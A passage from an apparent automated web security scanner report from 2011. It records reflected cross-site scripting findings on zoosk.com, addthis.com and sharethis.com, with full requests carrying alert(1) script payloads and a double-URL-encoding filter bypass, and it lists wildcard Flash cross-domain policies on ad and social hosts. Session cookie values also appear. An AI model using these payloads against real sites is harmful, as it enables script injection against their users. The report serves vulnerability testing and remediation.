Cookie: SESS50517945bd869367850ec6eccb963d0e=n5qdbfa776ito6bcf2tcnq44n6; __gads=ID=896293f29ede560c:T=1305396258:S=ALNI_Mbog5FLCqbXD1j1YETDTBBe7FFp0g; __utmz=36096679.1305396261.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36096679.1306617388.1305396258.1305396258.1305396258.1; __utmc=36096679; __qca=P0-925679482-1305396374957

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:41:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 14 May 2011 18:41:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!--[if lt IE 8]>
   <script
...[SNIP]...
<a href="/news/startups?40204"><script>alert(1)</script>60021ff941=1">
...[SNIP]...

6.49. http://www.zoosk.com/d/dating2/35/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoosk.com
Path:   /d/dating2/35/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aedc"><script>alert(1)</script>a2c0a8dbd4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/dating21aedc"><script>alert(1)</script>a2c0a8dbd4a/35/ HTTP/1.1
Host: www.zoosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=1, pre-check=2
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO PSA OUR"
Date: Sat, 14 May 2011 14:14:40 GMT
Keep-Alive: timeout=10, max=997
Expires: Thu, 11 Nov 1982 05:00:00 GMT
Pragma: no-cache
Connection: close
Set-Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lNR0ZpTnpKbE9EZGpZekZpWmpVNVlUVTJNREl5Wm1VeVlXUmlObVl3WTJFaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9; path=/; domain=.zoosk.com
Set-Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lNR0ZpTnpKbE9EZGpZekZpWmpVNVlUVTJNREl5Wm1VeVlXUmlObVl3WTJFaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9; path=/; domain=.zoosk.com
Content-Length: 10900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.zoosk.com/d/dating21aedc"><script>alert(1)</script>a2c0a8dbd4a/35/" />
...[SNIP]...

6.50. http://www.zoosk.com/d/dating2/35/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoosk.com
Path:   /d/dating2/35/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 463a5"><script>alert(1)</script>4eab7f9a29a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/dating2/35463a5"><script>alert(1)</script>4eab7f9a29a/ HTTP/1.1
Host: www.zoosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=1, pre-check=2
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO PSA OUR"
Date: Sat, 14 May 2011 14:14:54 GMT
Keep-Alive: timeout=10, max=999
Expires: Thu, 11 Nov 1982 05:00:00 GMT
Pragma: no-cache
Connection: close
Set-Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lOVGxrTkRFMFpXSTVaVFF6WW1VMFkyWTJNVFl6WW1ZNFpEazVObU0xWmpRaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9; path=/; domain=.zoosk.com
Set-Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lOVGxrTkRFMFpXSTVaVFF6WW1VMFkyWTJNVFl6WW1ZNFpEazVObU0xWmpRaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9; path=/; domain=.zoosk.com
Content-Length: 11611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.zoosk.com/d/dating2/35463a5"><script>alert(1)</script>4eab7f9a29a/" />
...[SNIP]...

6.51. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad6bb%2522%253balert%25281%2529%252f%252f365b3b1c98c was submitted in the Referer HTTP header. This input was echoed as ad6bb";alert(1)//365b3b1c98c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ad6bb%2522%253balert%25281%2529%252f%252f365b3b1c98c

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96343

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=ad6bb%2522%253balert%25281%2529%252f%252f365b3b1c98c";addthis_title="ad6bb";alert(1)//365b3b1c98c - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

6.52. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fa38"><script>alert(1)</script>72571cc404d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5fa38"><script>alert(1)</script>72571cc404d

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96385

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=5fa38"><script>alert(1)</script>72571cc404d" />
...[SNIP]...

6.53. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3da8e<script>alert(1)</script>09e684370db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3da8e<script>alert(1)</script>09e684370db

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96367

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</script>09e684370db";addthis_title="3da8e<script>alert(1)</script>09e684370db - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

6.54. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 5d362<script>alert(1)</script>cdc158780ac was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fadsafeprotected.com%2F&jsref=&rnd=1305396607919 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://adsafeprotected.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==5d362<script>alert(1)</script>cdc158780ac

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sat, 14 May 2011 18:10:11 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3OVb2YWRTJR8rMAg==5d362<script>alert(1)</script>cdc158780ac
userid:
</div>
...[SNIP]...

7. Flash cross-domain policy
There are 60 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sat, 14 May 2011 14:23:44 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.2. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sat, 14 May 2011 18:04:18 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.3. http://api.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Mon, 13 Jun 2011 18:04:19 GMT
X-FB-Server: 10.32.59.125
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

7.4. http://at.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:21:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Sat, 14 May 2011 20:21:39 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

7.5. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Sun, 15 May 2011 18:10:09 GMT
Date: Sat, 14 May 2011 18:10:09 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.6. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205345000"
Last-Modified: Thu, 15 Jul 2010 14:49:05 GMT
Content-Type: application/xml
Content-Length: 384
Date: Sat, 14 May 2011 14:21:34 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.7. http://c7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
X-Varnish: 1215537576
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2321
Date: Sat, 14 May 2011 14:21:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.8. http://d7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 619922229
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1385
Date: Sat, 14 May 2011 13:59:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.9. http://d8.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d8.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d8.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Sat, 14 May 2011 13:58:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.10. http://dis.criteo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sat, 14 May 2011 14:18:59 GMT
Expires: Tue, 08 May 2012 14:18:59 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.11. http://dis.us.criteo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sat, 14 May 2011 14:18:03 GMT
Expires: Tue, 08 May 2012 14:18:03 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.12. http://external.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 14 May 2011 22:34:19 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.13. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 14 May 2011 02:39:33 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 42244
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.14. http://hosted.newsgator.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.newsgator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

